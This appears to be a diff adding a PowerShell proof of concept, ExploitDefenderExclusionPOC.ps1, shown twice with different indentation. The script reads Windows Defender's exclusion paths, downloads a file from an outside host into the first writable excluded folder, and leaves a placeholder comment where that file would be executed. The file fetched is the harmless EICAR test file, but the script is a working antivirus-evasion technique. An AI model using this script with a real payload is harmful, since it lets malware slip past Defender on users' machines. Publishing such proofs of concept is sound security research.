packmad · March 24, 2020 11:23
diff --git a/ExploitDefenderExclusionPOC.ps1 b/ExploitDefenderExclusionPOC.ps1
 $ExPath = (Get-MpPreference).ExclusionPath
 if ($ExPath.Length -gt 0) {
    foreach ($path in $ExPath) {
        try {
            $url = "https://secure.eicar.org/eicar.com"
            $output = Join-Path -Path $path -ChildPath "eicar.com"
            Invoke-WebRequest -Uri $url -OutFile $output
            Write-Host "Dropped malicious file -> '$($output)'"
            # Execute $output ...
            return
        }
        catch{}
    }
    Write-Host "No writeable folders in ExclusionPath"
 }
 else {
    Write-Host "No exclusions"
 }
	$ExPath = (Get-MpPreference).ExclusionPath
	if ($ExPath.Length -gt 0) {
	foreach ($path in $ExPath) {
	try {
	$url = "https://secure.eicar.org/eicar.com"
	$output = Join-Path -Path $path -ChildPath "eicar.com"
	Invoke-WebRequest -Uri $url -OutFile $output
	Write-Host "Dropped malicious file -> '$($output)'"
	# Execute $output ...
	return
	}
	catch{}
	}
	Write-Host "No writeable folders in ExclusionPath"
	}
	else {
	Write-Host "No exclusions"
	}